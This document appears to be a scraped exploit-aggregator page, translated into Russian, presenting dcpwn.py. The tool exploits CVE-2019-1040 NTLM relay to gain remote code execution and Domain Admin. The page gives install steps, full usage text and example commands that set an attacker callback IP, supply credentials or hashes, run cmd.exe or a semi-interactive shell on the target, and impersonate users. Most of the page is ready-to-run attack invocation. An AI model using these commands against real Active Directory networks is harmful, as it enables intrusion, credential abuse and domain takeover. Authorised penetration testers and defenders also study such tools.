## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RIDTER-CVE-2019-1040-DCPWN
# CVE-2019-1040-dcpwn
Отличное описание! Эксплуатация CVE-2019-1040 - Объединение релейных уязвимостей для RCE и Domain Admin .
Итак, я написал dcpwn.py для удобства использования.
## Требования
Эти инструменты требуют impacket. Вы можете установить его через pip
root@kitploit:~
pip install impacket
## Использование
root@kitploit:~
использование: dcpwn.py [-h] [-u USERNAME] [-p PASSWORD] [--hashes HASHES] -d DOMAIN
[--smb-port [destination port]] --callback-ip CALLBACK_IP
--ldaps LDAPS --dc-ip DC_IP [--timeout TIMEOUT]
[--impersonate IMPERSONATE] -t Target [-share SHARE]
[--command [COMMAND [COMMAND ...]]] [--debug]
CVE-2019-1040 с делегированием Kerberos
необязательные аргументы:
-h, --help показать это сообщение справки и выйти
-u USERNAME, --user USERNAME
имя пользователя для аутентификации
-p PASSWORD, --password PASSWORD
Пароль для аутентификации, будет запрошен, если не
указан и не предоставлены хеши NT:NTLM
--hashes HASHES хеши LM:NLTM
-d DOMAIN, --domain DOMAIN
домен, в котором находится пользователь (FQDN или NETBIOS имя домена)
--smb-port [порт назначения]
Порт назначения для подключения к SMB серверу
--callback-ip CALLBACK_IP
Имя хоста или IP атакующего
--ldaps LDAPS Имя хоста или ldaps сервер
--dc-ip DC_IP IP-адрес контроллера домена
--timeout TIMEOUT тайм-аут в секундах
--impersonate IMPERSONATE
целевое имя пользователя, которое будет имитировано (через
S4U2Self) для запроса ST. Имейте в виду, что это будет
работать только если личность, указанная в этом скрипте,
разрешена для делегирования указанному SPN
-t Target, --target Target
Имя хоста/IP целевого сервера
-share SHARE общая папка, из которой будет взят вывод (по умолчанию
ADMIN$)
--command [COMMAND [COMMAND ...]]
команда для выполнения на цели. Если пусто, будет
запущена полуинтерактивная оболочка
--debug Включить отладочный вывод
пример:
root@kitploit:~
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target

Если вы хотите выполнить какую-либо команду, например cmd.exe, используйте `--command`
пример:
root@kitploit:~
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --command 'cmd.exe'
Если вы хотите имитировать указанного пользователя, используйте `--impersonate`
root@kitploit:~
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --impersonate someone